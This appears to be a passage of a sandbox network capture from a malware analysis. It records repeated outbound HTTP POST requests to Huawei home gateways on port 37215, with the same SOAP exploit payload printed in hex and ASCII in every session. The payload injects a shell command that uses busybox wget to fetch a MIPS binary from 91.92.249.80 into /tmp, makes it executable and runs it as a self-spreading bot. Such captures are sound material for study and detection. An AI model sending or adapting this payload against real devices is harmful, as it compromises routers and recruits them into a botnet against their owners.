                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          499192.168.2.233520441.196.37.7837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195300102 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          500192.168.2.2340364201.93.6.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195312977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          501192.168.2.2347362165.201.109.6537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195324898 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          502192.168.2.2339442157.246.146.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195326090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          503192.168.2.235829078.143.210.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195386887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          504192.168.2.2335060157.140.121.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195386887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          505192.168.2.234386477.139.184.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195400000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          506192.168.2.2355490197.163.226.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195411921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          507192.168.2.2342114157.170.158.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195450068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          508192.168.2.235264241.243.157.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195451975 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          509192.168.2.2340770157.212.199.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195547104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
